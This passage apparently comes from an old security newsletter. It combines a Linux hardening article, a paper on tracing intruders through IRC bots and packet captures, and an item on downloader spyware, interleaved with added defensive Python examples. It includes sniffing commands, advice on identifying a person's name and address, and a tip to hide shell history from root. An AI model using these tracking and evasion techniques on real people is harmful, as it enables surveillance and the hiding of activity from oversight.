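"""Evaluate TCP Wrappers access decisions the way hosts_access(5) does:
/etc/hosts.allow is searched first, then /etc/hosts.deny, and a client that
matches neither is allowed. Example code added for this article (not from
TCP Wrappers itself); the sample files are constructed."""
import ipaddress

# Constructed examples of the "deny everything, then permit specific sites" setup.
HOSTS_DENY = "ALL: ALL\n"
HOSTS_ALLOW = """# daemon_list : client_list
sshd: 192.168.1.
in.telnetd, in.ftpd: 10.1.0.0/255.255.0.0
ALL: 127.0.0.1
"""
# The shipped default the article warns about: no rules at all, so everyone is let in.
EMPTY = ""


def _parse(text):
    """Return [(daemon_list, client_list), ...] in file order."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = [p.strip() for p in line.split(":")]
        if len(parts) < 2:
            continue
        daemons = [d.strip() for d in parts[0].split(",")]
        clients = [c.strip() for c in parts[1].split(",")]
        rules.append((daemons, clients))
    return rules


def _client_matches(pattern, ip):
    """Match an IP against one client pattern: ALL, exact, 'net.' prefix, or net/mask."""
    if pattern == "ALL":
        return True
    if pattern.endswith("."):                       # e.g. 192.168.1.
        return ip.startswith(pattern)
    if "/" in pattern:                              # e.g. 10.1.0.0/255.255.0.0
        net, mask = pattern.split("/", 1)
        return ipaddress.ip_address(ip) in ipaddress.ip_network(f"{net}/{mask}", strict=False)
    return ip == pattern


def _file_matches(rules, daemon, ip):
    return any((daemon in ds or "ALL" in ds) and any(_client_matches(c, ip) for c in cs)
               for ds, cs in rules)


def access_allowed(daemon, ip, allow_text=HOSTS_ALLOW, deny_text=HOSTS_DENY):
    """True if the connection would be handed to the daemon, False if dropped."""
    if _file_matches(_parse(allow_text), daemon, ip):
        return True           # hosts.allow wins as soon as it matches
    if _file_matches(_parse(deny_text), daemon, ip):
        return False
    return True               # neither file matched: wrappers default to allow


if __name__ == "__main__":
    for d, ip in (("sshd", "192.168.1.7"), ("sshd", "203.0.113.9"), ("in.ftpd", "10.1.42.1")):
        print(d, ip, "ALLOW" if access_allowed(d, ip) else "DENY")
    print("no rules at all:", access_allowed("in.fingerd", "203.0.113.9", EMPTY, EMPTY))
```

The last line of the usage shows the point of recommendation 2: with both files empty, the wrapper allows the connection.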
So, for the truly paranoid, I have added some additional steps you can take.

First we will create the wheel group. The wheel group is a group of select individuals that can execute powerful commands, such as /bin/su. By limiting the people that can access these commands, you enhance the system security. To create the group, vi the file /etc/group, create the group wheel, and add the system admins to the group. Then identify critical system binaries, such as /bin/su. Change the group ownership to wheel, and the permissions to owner and group executable only (be sure to maintain the suid or sgid bit for specific binaries). For /bin/su, the commands would be:

    /bin/chgrp wheel /bin/su
    /bin/chmod 4750 /bin/su

Second, we will lock down the files .rhosts, .netrc, and /etc/hosts.equiv. The r commands use these files to access systems. To lock them down, touch the files, then change the permissions to zero, locking them down. This way no one can create or alter the files. For example,

    /bin/touch /root/.rhosts /root/.netrc /etc/hosts.equiv
    /bin/chmod 0 /root/.rhosts /root/.netrc /etc/hosts.equiv

Third, we configure /etc/shadow to use MD5 hashes instead of the crypt(3) function. This makes the encrypted password file far more difficult to crack. This is done by modifying the PAM modules. PAM (Pluggable Authentication Modules) is a suite of shared libraries that enable you to choose how applications authenticate users. To learn more about PAM, check out ftp://ftp.us.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html. In the old days, you had to manually modify the PAM modules to use MD5 hashes. However, with Red Hat 6.0 or greater, you can select MD5 hashes with the setup utility. Just type "setup" at the command prompt, then select "authentication configuration". From there, you can choose to use MD5 hashes. However, the MD5 hashes will not take effect until the user re-enters their password.
For those of you who do not have the setup utility (or have Red Hat 5.2 or earlier), you can still modify the PAM modules manually (example G).

For us bash users, I'm not a big fan of the .bash_history file. I do not want people (including root) to know my command history. So, in my .bash_profile, I export the following entry:

    HISTFILESIZE=0

This means that nothing will be logged to my .bash_history file. I will still have keystroke history and recall (the HISTSIZE env variable), but command history will not be written to the .bash_history file.

The last thing we can do is protect our system from physical access. This mainly consists of setting up a password for our BIOS. Also, you can password protect your system during boot-up by configuring /etc/lilo.conf with a password (password=xxx) where xxx is your password. However, keep in mind, once someone has physical access to your system, there is no guaranteed way to protect it.

IPChains

No discussion about Linux security would be complete without covering IPChains. IPChains is packet filtering software that comes with the 2.2.x kernel and above. This means if you are running Red Hat 6.0 or later, you have it as part of your Linux installation kit. IPChains is similar to Cisco Access Control Lists; it can control what packets can come in and out of your Linux box. Primarily used as a firewall application, IPChains can also be used to armor your standalone Linux box. To armor a standalone system, I configure IPChains to allow only TCP connections I initiate. If anyone attempts to initiate any TCP connections to me, the connection is denied. Since IPChains is not stateful, I do allow all UDP and ICMP connections. Last, I log all denied connections; this lets me know if someone out there is being naughty :) However, I drop but do not log all the broadcast/multicast traffic, as this would quickly fill up the system logs. A simple IPChains configuration to armor a standalone system would look something like this.
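Before the `ipchains -L` listing that follows, here is an added example (not the article's code and not ipchains itself) that walks a packet through that input chain rule by rule, so you can see why an inbound SYN is denied and logged while the reply half of a connection you opened is accepted. It models only what the listing uses: protocol, source/destination nets, the `! -y` (not SYN-only) match, the `-l` log flag, and the chain policy. The rule order is transcribed from the listing; the packets in the usage are constructed.

```python
"""Walk a packet through the input chain of the standalone IPChains ruleset
described above and report the target and whether the hit was logged.
Added example, not part of the article or of ipchains; it models only the
features the listing uses (protocol, source/destination nets, '! -y' SYN
matching, '-l' logging, chain policy)."""
import ipaddress

# Rules transcribed in order from the `ipchains -L` listing in the article:
# (proto, source net, destination net, match_only_non_syn, log, target)
RULES = [
    ("all",  "0.0.0.0/32", "0.0.0.0/0",          False, False, "DENY"),   # source 0.0.0.0
    ("all",  "0.0.0.0/0",  "255.255.255.255/32", False, False, "DENY"),   # broadcast, not logged
    ("all",  "0.0.0.0/0",  "224.0.0.0/8",        False, False, "DENY"),   # multicast, not logged
    ("tcp",  "0.0.0.0/0",  "0.0.0.0/0",          True,  False, "ACCEPT"), # '! -y': not a new connection
    ("udp",  "0.0.0.0/0",  "0.0.0.0/0",          False, True,  "ACCEPT"),
    ("icmp", "0.0.0.0/0",  "0.0.0.0/0",          False, True,  "ACCEPT"),
    ("all",  "0.0.0.0/0",  "0.0.0.0/0",          False, True,  "DENY"),   # everything else, logged
]
POLICY = ("DENY", False)   # chain policy when no rule matches (policy hits are not logged)


def _in_net(net, ip):
    return ipaddress.ip_address(ip) in ipaddress.ip_network(net, strict=False)


def decide(proto, src, dst, syn=False):
    """Return (target, logged). `syn=True` means a TCP segment with only SYN
    set, i.e. somebody trying to open a connection to this host."""
    for r_proto, r_src, r_dst, non_syn_only, log, target in RULES:
        if r_proto != "all" and r_proto != proto:
            continue
        if not (_in_net(r_src, src) and _in_net(r_dst, dst)):
            continue
        if non_syn_only and syn:       # a rule written with '! -y' skips SYN-only packets
            continue
        return target, log
    return POLICY


if __name__ == "__main__":
    # Constructed packets: an inbound connection attempt, a reply segment,
    # a UDP datagram, and a broadcast.
    for pkt in (("tcp", "203.0.113.5", "192.0.2.10", True),
                ("tcp", "203.0.113.5", "192.0.2.10", False),
                ("udp", "203.0.113.5", "192.0.2.10", False),
                ("udp", "203.0.113.5", "255.255.255.255", False)):
        print(pkt, "->", decide(*pkt))
```

The model also makes the author's "not stateful" caveat concrete: any TCP segment without the SYN-only flag combination is accepted, whether or not it belongs to a connection this host opened.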
    bash# ipchains -L
    Chain input (policy DENY):
    target     prot opt     source                destination               ports
    DENY       all  ------  0.0.0.0               anywhere                  n/a
    DENY       all  ------  anywhere              255.255.255.255           n/a
    DENY       all  ------  anywhere              BASE-ADDRESS.MCAST.NET/8  n/a
    ACCEPT     tcp  !y----  anywhere              anywhere                  any ->   any
    ACCEPT     udp  ----l-  anywhere              anywhere                  any ->   any
    ACCEPT     icmp ----l-  anywhere              anywhere                  any ->   any
    DENY       all  ----l-  anywhere              anywhere                  n/a
    Chain forward (policy ACCEPT):
    Chain output (policy ACCEPT):

To see the config files for this, see example H. To learn more about using IPChains as a firewall or for a standalone system, check out the IPChains HOWTO.

Conclusion

We have covered some of the more basic steps involved in armoring a Linux box (Red Hat distribution). The key to a secure system is having the minimal software installed, with protection in layers, such as TCP Wrappers, IPChains, and shadowed passwords. There are many additional steps that can be taken, such as tripwire (monitor changes in system binaries) and swatch (automated log monitoring and alerts). I also recommend that new Linux users check out Bastille Linux, a PERL script that can automatically secure your new Linux system, step by step. Remember, no system is truly 100% secure. However, with the steps outlined above, you greatly reduce the security risks.

@HWA

310.0 [IND] Paper: Tracking Hackers On Irc by Theory Group
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://theorygroup.com/Theory/irc.html

Tracking Hackers on IRC
By: David Brumley [dbrumley@theorygroup.com]

Few hackers are motivated purely by knowledge, science, and curiosity. Hackers continue to break into systems long after they become familiar with the technology. Instead, many continue to hack simply because of the social status it brings. For many, hacking *is* a social activity. Hackers meet online to discuss the latest hacking tools, their hacking conquests, and their personal life.
System administrators and security professionals must become familiar with the social culture hackers dwell in to be truly effective. Internet Relay Chat (IRC) has replaced electronic bulletin boards as the social mecca for internet addicts. Hackers are no exception. Cybersleuths must understand the jargon and tools used in this virtual society. By understanding IRC tools and jargon a cybersleuth can determine the real identity of a hacker, from birthplace to current address and telephone number.

System logs help administrators and security professionals track down criminals. They are useful evidence that a crime has been committed, but not much else. System logs show how and where the electronic bits came from, but they don't show *who* sent them. To prosecute successfully you must not only show where the intruder came from, but who was physically using the keyboard at that particular time. IRC can be a tool for finding out.

For example, even with a full audit trail showing an intruder came from a particular account on a particular ISP, the most you can hope to obtain is billing information for the account. While sometimes sufficient, you still haven't shown *who* was using the keyboard at the other end of the connection. The account you traced may have been stolen, set up with false billing information, or shared among several in a household. An IRC savvy administrator, however, may be able to determine the exact identity of the intruder. How? By listening to the hacker on IRC and reviewing configuration information on IRC tools left behind. A hacker bragging about compromising your host is also a full confession when logged. The IRC tools may be configured to always allow particular ISP connections, which may help in pinning down their location. With a little deductive reasoning you can pin down who hacked your machine, what their name is, where they live, and even their favorite corner liquor store.

There are literally dozens of IRC networks.
The most popular are DALnet, EFNet, and Undernet. Each IRC network is composed of hundreds, perhaps thousands, of channels where individuals with similar interests can chat in real time with each other. Channels are dynamic by nature. A channel is created the first time someone enters and destroyed when the last person leaves. The first person in a channel is also the channel operator, known as "chanops", or simply "ops". A channel operator is the super user for the channel: they can invite other users to the channel, set the topic, decide who can talk, and give or take operator status from others on the channel.

On some networks, such as DALnet and Undernet, channels can be registered after creation. Registration allows the creator to become a channel operator every time they log on to their channel. Registration assigns ownership of a channel. Many IRC networks, including the ever popular EFNet, don't have channel registration. When you leave a channel, you leave all your privileges in that channel as well. You must be re-op'ed every time you join the channel.

Hackers love dynamic networks like these because it allows them to take over channels. Hackers will force all legitimate users out of a channel until they are all that is left. When they are the only ones in the channel, they can op themselves. The primary method for forcing users off of a channel is Denial of Service (DoS) attacks. If the victim's computer is swamped by a DoS, it will time out and disconnect from IRC.

Hackers who participate in these dynamic IRC networks have one primary goal: to keep operator status on the channels they frequent. To do this they must protect against others trying to take over their channel, rogue administrators randomly de-oping them, and deal with the inevitable denial of service attack. To solve these problems, hackers have come up with ingenious ways to create redundant connections from multiple hosts to an IRC network.
The simplest solution is to run multiple IRC clients, such as ircII or BitchX, from several hosts. By running the clients under screen(1), a unix terminal multiplexer, they can detach IRC sessions into the background and reattach to them later. Each session corresponds to one nickname on the IRC network. If one host goes down, he can always re-attach to a running session on another machine. Since each nickname has operator status, the whole scheme is redundant. It is up to the intruder, however, to maintain daily every IRC session on every host - a very labor intensive activity.

IRC 'bots', short for robot, solve the problem of 'hands-on' administration. The purpose of a bot is to sit on IRC and monitor channels for events. In a very simple sense bots are only automated IRC clients. Running stand alone, a bot will automatically op friends (as specified in the configuration file), enforce bans for channel misuse, and provide some channel misuse control. The true power of bots, however, is their ability to link together to form "botnets". Each bot on a botnet serves as a redundant backup, automatically oping friends and other bots, enforcing channel bans, and ensuring a party line exists.

Each bot on the botnet is a node. The botnet administrator appoints a master node, with the rest becoming slaves. The master node is in charge of distributing botnet configuration information to each slave. After initial configuration, the botnet administrator need only change configuration information on the master. The master will then automatically take care of updating all the sub-nodes. To add a bot to the network only a simple and static configuration file that specifies the master is needed. Once the new bot starts up, it will automatically contact the master and pull over the requisite configuration information to become a node on the botnet. The advantage to a hacker is enormous.
For each new account or system compromise, the hacker need only upload the actual executable and a simple configuration file. Once started, the new bot automatically downloads all information including current lists of channels, friends, and users. The new bot will also then automatically update every time the configuration on the master is changed.

The most famous bot is "eggdrop", available at http://www.eggdrop.net. It serves as a good model for the typical bot. Its configuration file is divided up into three logical sections (sometimes in three separate files, sometimes merged into one): user information, channel information, and bot information.

Channel information can be recognized by the "channel add" TCL command. Following the channel name is a list of options to apply to that channel. A sample eggdrop channel file looks like:

    channel add #myhacker {
        chanmode "+ismt"
        dont-idle-kick
        +userbans
        +protectops
    }

The chanmode defines what mode the channel should be. In this particular example channel #myhacker is invite only (i), secret (s), moderated so that only channel operators can talk (m), and only channel operators can change the topic (t). The last three items define eggdrop configuration variables. Entries that begin with a plus (+) will enable options, entries that begin with a minus (-) will disable options. Entries with neither a plus nor a minus simply define a variable, i.e. make it true. In this particular example the bot will not kick idle users from #myhacker, it will let user operators (as opposed to other bots on the botnet) ban people, and will automatically re-op de-oped users. For a full list of options, see the example configuration file that comes with the eggdrop distribution.

A user entry for an eggdrop bot can consist of four lines. The first line always contains the nickname, password, and flags of the bot user. The remaining three lines all use the first two characters to identify the type of configuration information.
Entries that start with a "-" list user identifiers. To a bot, a user's identity is not their nickname, but the username@hostname.domain.zone where they are connecting from. A line that begins with ":" is a botnet configuration entry. It lists the HOSTNAME:PORT that the particular bot for that user will listen on. When two bots communicate they use the port on the host listed. Lines that begin with "!!" or "." contain time stamp information on the user. Entries beginning with "!!" are the channel name and time stamp where the user was last seen by the bot. Entries with "." are the modification time of the entry itself. All times are kept in UNIX epoch format.

User files often contain dozens of bot users. If you've found an eggdrop configuration file on a compromised host, chances are most of the entries in the file are also compromised hosts or accounts. A quick note to the administrator of each domain explaining that you've found a hacker configuration file that references his domain is appropriate. You can also use the information in creating an MO (Modus Operandi) file for the hacker. People listed in the user file are often friends of the hacker (whom you may see in the future :) or alternate nicknames the hacker may be using. Here's an example of an eggdrop user file:

    eleet lypmjwfp2ee fbs /0 0 0 0
    - *!eleet@*.elaine.Stanford.EDU, *!eleet@*.myth.stanford.edu
    : firebird.stanford.edu:60000
    !! 895178133 #stanford
    . {created 894412528}

Hackers often will not connect to IRC directly. By using a variety of hosts a hacker can subvert a ban, trick others into thinking he is someone else, or connect to an IRC server that limits connections. Most often, though, it is to hide his real IP address in case someone is watching them. A "bounce" program reads from one port and writes to another, i.e. a proxy. The most famous bounce programs are BNC and WinGate.
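The user-file format just described (header line, then "-", ":", "!!" and "." continuation lines) is simple enough to parse, and doing so is how an incident responder turns a recovered eggdrop user file into a list of domains to notify and readable timestamps. The following is an added example, not eggdrop's code and not from the article's author; it parses the sample entry quoted above, which is the only input it has been written for. The split of the header line into nick, password and flags follows the text's description; the field layout beyond the flags is not interpreted.

```python
"""Parse an eggdrop-style user file (the format described above) and pull out
what an incident responder wants: the hostmasks, the botnet host:port, and
human-readable timestamps. Added example, not eggdrop's own code; the sample
is the entry quoted in the article."""
from datetime import datetime, timezone

SAMPLE_USERFILE = """eleet lypmjwfp2ee fbs /0 0 0 0
- *!eleet@*.elaine.Stanford.EDU, *!eleet@*.myth.stanford.edu
: firebird.stanford.edu:60000
!! 895178133 #stanford
. {created 894412528}
"""


def _utc(epoch):
    """Render a UNIX epoch timestamp as a UTC string."""
    return datetime.fromtimestamp(int(epoch), timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def parse_userfile(text):
    """Return a list of user records; a new record starts at every line that
    does not begin with one of the continuation markers - : ! ."""
    users, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line[0] not in "-:!.":
            parts = line.split()                 # nick password flags ...
            cur = {"nick": parts[0], "flags": parts[2] if len(parts) > 2 else "",
                   "hostmasks": [], "botnet": None, "last_seen": None, "created": None}
            users.append(cur)
        elif cur is None:
            continue                             # continuation line before any header
        elif line.startswith("-"):
            cur["hostmasks"] += [h.strip() for h in line[1:].split(",") if h.strip()]
        elif line.startswith(":"):
            host, _, port = line[1:].strip().rpartition(":")
            cur["botnet"] = (host, int(port))
        elif line.startswith("!!"):
            fields = line[2:].split()            # epoch channel
            cur["last_seen"] = (_utc(fields[0]), fields[1] if len(fields) > 1 else "")
        elif line.startswith("."):
            m = line[1:].strip().strip("{}").split()
            if len(m) == 2 and m[0] == "created":
                cur["created"] = _utc(m[1])
    return users


def domains_to_notify(users):
    """Domains behind the hostmasks, i.e. the admins the article suggests writing to."""
    out = set()
    for u in users:
        for mask in u["hostmasks"]:
            host = mask.rsplit("@", 1)[-1].lstrip("*.")
            out.add(host.lower())
    return sorted(out)


if __name__ == "__main__":
    for u in parse_userfile(SAMPLE_USERFILE):
        print(u["nick"], u["flags"], u["botnet"], u["last_seen"], u["created"])
    print(domains_to_notify(parse_userfile(SAMPLE_USERFILE)))
```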
Both accept a TCP connection, connect to a destination, and then relay anything from the original connection to the destination. The primary legitimate use for WinGates is SOCKS and TCP proxies to the internet. Although WinGates can be configured to require a password, most are not. When a hacker has access to a WinGate he can "bounce" through the WinGate server to hide his tracks.

BNC, the word "bounce" with the vowels removed, are UNIX based proxies designed primarily for "bouncing" IRC traffic. While a WinGate can proxy multiple ports, a BNC runs as a daemon listening to only one port. After accepting a connection, they too proxy information read on the original connection to a destination. In addition to simple proxying, the BNC configuration file allows for creating fake ident responses, virtual host configuration, and limiting the number of users who can use the bounce.

Since these processes run for extended periods of time, a hacker will often try to hide them from an administrator. If a hacker has superuser access and is skillful he can hide any process from any administrator. Luckily many hackers are sloppy or lazy. Often they will just change the name of the program to be something innocuous. A local favorite seems to be "pine". The hacker runs the process under the new name hoping that the administrator will not notice. Because hackers are adept at hiding process names, you should always be aware of the network connections your host generates. netstat(1m) and lsof (http://vic.cc.purdue.edu/pub/tools/lsof_4.45_W.tar.gz) are good tools for monitoring local network connections. An administrator should also be wary of local processes, such as "./pine" or "./emacs", binding to unusual ports. It's a safe bet that pine doesn't listen on port 6666 and write to irc.erols.com.

After you've identified a hacker is on your system, and they appear to be using IRC, consider setting up a network sniffer.
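Both the netstat check in the Linux armoring article above (confirm which services are still listening after the startup-script cleanup) and the advice here (be wary of "./pine" bound to an IRC port) come down to reading netstat output with a critical eye. The following is an added example, not the code of either author and not netstat itself: it parses constructed `netstat -anp` output, lists what is listening, and flags sockets owned by a relative-path binary or talking to IRC ports without being a known IRC client. The IRC port range and the allowlist of client names are assumptions for the example.

```python
"""Read `netstat -anp`-style output and report (1) what is still listening
after the startup-script cleanup and (2) connections that look like a renamed
IRC client or bouncer, e.g. "./pine" bound to an IRC port. Added example for
this article, not from the author or from netstat; the sample output is
constructed."""

# Constructed sample of `netstat -anp` output (Linux net-tools layout).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      412/sshd
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      301/portmap
tcp        0      0 0.0.0.0:6666            0.0.0.0:*               LISTEN      1893/./pine
tcp        0      0 192.0.2.10:1031         198.51.100.7:6667       ESTABLISHED 1893/./pine
udp        0      0 0.0.0.0:111             0.0.0.0:*                           301/portmap
"""

IRC_PORTS = set(range(6660, 6670)) | {7000}              # usual IRC server ports (assumed)
KNOWN_IRC_CLIENTS = {"irc", "ircii", "bitchx", "xchat"}  # assumed allowlist for the example


def _split_addr(addr):
    host, _, port = addr.rpartition(":")
    return host, (None if port == "*" else int(port))


def parse_netstat(text):
    """Return one dict per socket line; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or not parts[0].startswith(("tcp", "udp")):
            continue
        if parts[0].startswith("tcp") and len(parts) == 7:
            proto, local, foreign, state, pidprog = parts[0], parts[3], parts[4], parts[5], parts[6]
        elif parts[0].startswith("udp") and len(parts) == 6:   # UDP lines have no State column
            proto, local, foreign, state, pidprog = parts[0], parts[3], parts[4], "", parts[5]
        else:
            continue
        pid, _, prog = pidprog.partition("/")
        lhost, lport = _split_addr(local)
        fhost, fport = _split_addr(foreign)
        rows.append({"proto": proto, "local_host": lhost, "local_port": lport,
                     "foreign_host": fhost, "foreign_port": fport,
                     "state": state, "pid": pid, "prog": prog})
    return rows


def listening_services(rows):
    """(proto, port, program) for every socket accepting traffic."""
    out = set()
    for r in rows:
        if r["state"] == "LISTEN" or (r["proto"].startswith("udp") and r["foreign_port"] is None):
            out.add((r["proto"], r["local_port"], r["prog"]))
    return sorted(out)


def suspicious_sockets(rows):
    """Sockets whose owner is a relative-path binary, or which use IRC ports
    without being a known IRC client."""
    flagged = []
    for r in rows:
        name = r["prog"].rsplit("/", 1)[-1].lower()
        on_irc_port = r["local_port"] in IRC_PORTS or r["foreign_port"] in IRC_PORTS
        if r["prog"].startswith("./") or (on_irc_port and name not in KNOWN_IRC_CLIENTS):
            flagged.append(r)
    return flagged


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("listening:", listening_services(rows))
    for r in suspicious_sockets(rows):
        print(f"SUSPICIOUS pid={r['pid']} prog={r['prog']} "
              f"local={r['local_port']} foreign={r['foreign_host']}:{r['foreign_port']}")
```

Feed it the real output (`netstat -anp | python3 this.py` style, reading stdin instead of the constant) and compare the listening set against the services you meant to keep.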
(Please make sure you talk to your institution's legal department and are aware of all applicable laws.) Network dumps are valuable because little, if any, IRC activity is encrypted. Even if a hacker uses an encrypted client to log in, such as SSH, the actual connection to the IRC server will most likely be in clear-text.

TCPDump (available from ftp://ftp.ee.lbl.gov) is the standard packet sniffer on most Unix hosts. By default it only captures the first few bytes of every transaction: just enough to diagnose routing and network problems. When you're interested in logging entire sessions it's important to read all available packet information. With TCPDump, the -s option controls how much data in each packet is collected. Consult your network MTU to determine the optimum setting. We use:

    # /usr/sbin/tcpdump -n -s 1600 -F -w tcpdump.

A quick and easy way to view the dump is to use the Unix command strings(1). If too much information is picked up, you can separate your tcpdump file using:

    # /usr/sbin/tcpdump -r tcpdump. -w

and then run strings again on the output file. For example, if you're only concerned with IRC traffic (which normally is on port 6667), use:

    # /usr/sbin/tcpdump -r tcpdump. -w irc. dst port 6667
    # strings irc.

After gathering as much information about the hacker as possible through a packet dump and information from the various IRC configuration files, compile an M.O. (Modus Operandi) file. The M.O. should contain information such as the hacker's preferred nickname and any variations used, any dial-ups used, any related incidents, and any personal information discovered. On several occasions I have picked up the exact age, name, and location of the hacker! This type of data is invaluable when contacting law enforcement and correlating various incidents. I've found plotting the information on a map is a good way to provide a quick reference of active hackers. On a slow afternoon I have also been known to go back to the M.O.
files and check to see who is on IRC. If I believe I see the same hacker I'll send a quick note to the administrator of the domain, alerting them to a potential problem. Sometimes it turns out to be nothing, but the message is always appreciated.

I use ircii (available from http://www.irchelp.org/irchelp/ircii/), the classic UNIX irc client, and primarily connect to EFnet. (Macintosh and PC users should check out http://www.irchelp.org for a list of clients.) Generally the unix clients are safe as long as you use common sense. Don't accept files from strangers, don't run untrusted IRC scripts, and never run commands you don't understand. With most clients all IRC commands start with a forward slash ("/"). Everything else is a message sent to the channel.

After connecting, the first thing I do is start a log. With ircii, the command is:

    /set log on

The logfile will be named IrcLog. To change names, type:

    /set logfile

To look for a person, use the "who" command:

    /who -nick    (looks for a particular nickname)
    /who -host    (looks for anyone using a particular host)

Wildcards are allowed. However, users marked as "invisible" will only show if you specify their exact nickname. When checking IRC, be sure to look for all variations of the nickname. Hackers have the habit of logging in from a hacked site on a secondary nickname, while logged in with their primary nickname on their dial-in account. For example, perhaps there is a hacker who goes by the nickname "eleet". Querying IRC for eleet and eleet_ might show:

    * eleet  H* user@ppp-7.isp.net
    * eleet_ H* root@www.companyname.com

Chances are that www.companyname.com has been hacked. Even more interesting is that the person who did it probably, though not certainly as ident responses can be faked, is also using the dialup ppp-7.isp.net.

One note of caution: when using IRC use the who command, not whois. /who -nick will give you information on the nickname.
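Running strings(1) over the packet dump gives raw lines; what the investigator actually wants from them is who claimed which nick, which channels were joined, what was said, and the nick/user@host pairs a WHO query returns (the "eleet" / "eleet_" comparison above). The following is an added example, not the article's code and not part of ircii or tcpdump: it parses IRC protocol lines (RFC 1459 framing, prefix / command / params / trailing) from a constructed reassembly of one client's TCP stream and summarises them. The sample nicks, hosts and channel are constructed.

```python
"""Parse IRC protocol lines (RFC 1459 framing) pulled from a capture and
summarise what an investigator needs: nicks claimed, channels joined, messages
sent, and the nick/user@host pairs that WHO (numeric 352) returns. Added
example for this article, not the author's code; the payload below is a
constructed reassembly of one client's TCP stream."""

# Constructed sample: what `strings` would show from a client's IRC session.
SAMPLE_PAYLOAD = (
    b"NICK eleet_\r\n"
    b"USER root 0 * :root\r\n"
    b":eleet_!root@www.example.com JOIN :#myhacker\r\n"
    b":eleet_!root@www.example.com PRIVMSG #myhacker :got into www.example.com last night\r\n"
    b":irc.example.net 352 eleet_ #myhacker root www.example.com irc.example.net eleet_ H* :0 root\r\n"
    b":irc.example.net 352 eleet_ #myhacker user ppp-7.isp.example irc.example.net eleet H* :0 someone\r\n"
)


def parse_irc_line(line):
    """Split one IRC line into (prefix, COMMAND, [params]); the trailing
    parameter after ' :' may contain spaces and is kept whole."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    if not params:
        return prefix, "", []
    return prefix, params[0].upper(), params[1:]


def irc_messages_from_payload(payload):
    """Decode a reassembled TCP payload and parse every CRLF-terminated line."""
    text = payload.decode("latin-1")
    return [parse_irc_line(l) for l in text.split("\r\n") if l.strip()]


def summarize(messages):
    """Collect nicks, joins, messages and WHO replies from parsed messages."""
    summary = {"nicks": [], "joins": [], "privmsg": [], "who": []}
    for prefix, cmd, params in messages:
        if cmd == "NICK" and params:
            summary["nicks"].append(params[0])
        elif cmd == "JOIN" and params:
            summary["joins"].append((prefix, params[0]))
        elif cmd == "PRIVMSG" and len(params) >= 2:
            summary["privmsg"].append((prefix, params[0], params[1]))
        elif cmd == "352" and len(params) >= 7:
            # RPL_WHOREPLY: <me> <channel> <user> <host> <server> <nick> <flags> :<hops> <realname>
            _channel, user, host, _server, nick, flags = params[1:7]
            summary["who"].append((nick, f"{user}@{host}", flags))
    return summary


def hosts_for_nick_variants(who, base):
    """Map every WHO nick that starts with `base` (eleet, eleet_, ...) to its user@host."""
    return {nick: userhost for nick, userhost, _flags in who if nick.startswith(base)}


if __name__ == "__main__":
    s = summarize(irc_messages_from_payload(SAMPLE_PAYLOAD))
    print(s["joins"], s["privmsg"])
    print(hosts_for_nick_variants(s["who"], "eleet"))
```

In practice the payload comes from reassembling the `dst port 6667` stream (or the whole session for both directions); the parser itself does not care which side sent a line.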
/whois will give you more information, but will also notify the user that someone is querying their nickname.

Due to the number of hackers using IRC it is often the target of criticism, but there are thousands of legitimate users who use the IRC networks daily. Like any other community there will always be a criminal element. When hackers do use IRC it allows the administrator to monitor the criminal element and gain insight into their methodologies and habits. The acquisition of this knowledge can help system administrators, law enforcement, and security professionals track and prosecute hackers more effectively.

Reference sites:

  http://www.eggxpress.com - Information on eggdrop, BNC, and BitchX configuration files
  http://www.eggdrop.net - The home of eggdrop
  http://www.irchelp.org - Provides introductory documents and tutorials for using IRC
  http://metalab.unc.edu/dbarberi/papers/chats - Papers about the social perspective of IRC
  http://www.efnet.net - The popular EFNet, a dynamic IRC network and a favorite of many hackers
  http://www.undernet.org - The Undernet IRC network
  http://www.newnet.net - The NewNET IRC network
  http://www.self-evident.org - Dedicated to news on EFnet, including information on hackers and channels they frequent

@HWA

311.0 [IND] More spies in the wires..software that snoops on you and more.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from Packetstorm.securify.com

URL: grc.com/downloaders.htm

Our Site of the Week is The Anatomy of File Download Spyware. "Spyware" is a name given to software which secretly tells its manufacturer your personal information. This page investigates the spyware-like features which come installed with RealNetworks RealDownload, Netscape/AOL Smart Download, and NetZip Download Demon utilities. RealNetworks RealDownload turns out not only to send the URL of the files you download, but the Windows GUID, a unique identifier which includes each computer's MAC address.
Info from the site:

The Anatomy of File Download Spyware
by Steve Gibson, Gibson Research Corporation -- 2000/7/14
Page Updated: Wednesday, July 26th, 2000 (only added a link to my telephone appearance on ZDTV.)

What do the NetZip-descended file downloaders whisper when they think you are not listening?

OVERVIEW: How Does This Affect YOU?

As you will see on the page below, if you use the RealNetworks RealDownload, Netscape/AOL Smart Download, or NetZip Download Demon utilities in their default configuration . . . EVERY TIME you use one of these utilities to download ANY FILE from ANYWHERE on the Internet, the complete "URL address" of the file, along with a UNIQUE ID TAG that has been assigned to YOUR machine, and in the case of Netscape's SmartDownload only YOUR computer's individual Internet IP address, is immediately transmitted to the program's publisher. This allows a database of your entire, personal, file download history to be assembled and uniquely associated with your individual computer . . . for whatever purpose the program's publishers may have today, or tomorrow.

VERY IMPORTANT: When I re-examined my findings in the face of RealNetworks' insistence that I was absolutely wrong about my conclusions, I caught something that I had missed before: My exact personal name and private eMail address was being sent back to RealNetworks whenever I downloaded a file. When I confronted RealNetworks with this, they explained that it was due to the fact that I had purchased a product from them in the past, and the "cookie" my system had received during the purchase was being returned to them. That certainly makes file downloads seem far less "anonymous" than RealNetworks continues to allege. (Full details are provided below.)

The Saga Unfolds . . .

Friday, July 14

